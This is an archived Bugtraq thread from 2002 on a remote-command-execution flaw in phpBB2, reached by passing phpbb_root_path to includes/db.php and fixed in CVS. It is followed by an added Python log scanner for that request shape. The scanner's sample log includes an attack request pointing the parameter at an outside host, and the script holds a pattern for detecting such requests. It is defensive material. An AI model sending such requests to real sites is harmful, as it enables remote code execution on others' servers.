Bugtraq mailing list archives

Re: phpBB2 remote execution command (fwd)
From: Jose Romeo Vela <jrvela () aristasol com>
Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)

--- nullbyte <nullbyte () inetd-secure net> wrote:
phpBB2 is vulnerable to remote execution command

All *nix running phpBB2 version 2.0.

Bug could be found at "phpBB2 root path" which is allowed remote
to execute any command remotely.
The vulnerability of this attack starts with
'/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
are needed to launch the attack.

I did not look further into this bug.
It is tested on most *nix systems running phpBB2 version 2.0.
Probably all

Bug was found by pokley and nullbyte

nullbyte () inetd-secure net

This bug only affects non-CVS versions. There is a fix available. For
details see:


Jose Romeo Vela
jrvela () aristasol com
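
Added example, not part of the original thread or of phpBB: a log check for the request shape named in the report, a script under `includes/` called with `phpbb_root_path` in the query string. It assumes common-log-format access logs and that clients never legitimately supply this parameter; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "phpbb_root_path"  # parameter named in the report
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://host or //host

# Constructed sample lines (common log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Mar/2002:20:01:11 -0500] "GET /phpBB2/index.php HTTP/1.0" 200 5120
198.51.100.7 - - [18/Mar/2002:20:03:42 -0500] "GET /phpBB2/includes/db.php?phpbb_root_path=http%3A%2F%2Fhost.example%2F HTTP/1.0" 200 312
203.0.113.5 - - [18/Mar/2002:20:04:02 -0500] "GET /phpBB2/includes/db.php?phpbb_root_path=./ HTTP/1.0" 200 0
192.0.2.10 - - [18/Mar/2002:20:05:00 -0500] "GET /phpBB2/viewtopic.php?t=4 HTTP/1.0" 200 8841
"""

def classify(line):
    """Return a dict describing a suspicious request, or None if unrelated."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path).lower()
    # Only direct requests to PHP files under an includes/ directory.
    if "/includes/" not in path or not path.endswith(".php"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            value = unquote(value)  # second decode catches double-encoded values
            # A value pointing at another host is the high-severity case;
            # any other client-supplied value still deserves a look.
            severity = "high" if REMOTE_RE.match(value) else "review"
            return {"client": line.split(" ", 1)[0], "path": path,
                    "value": value, "severity": severity}
    return None

def scan(log_text):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```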
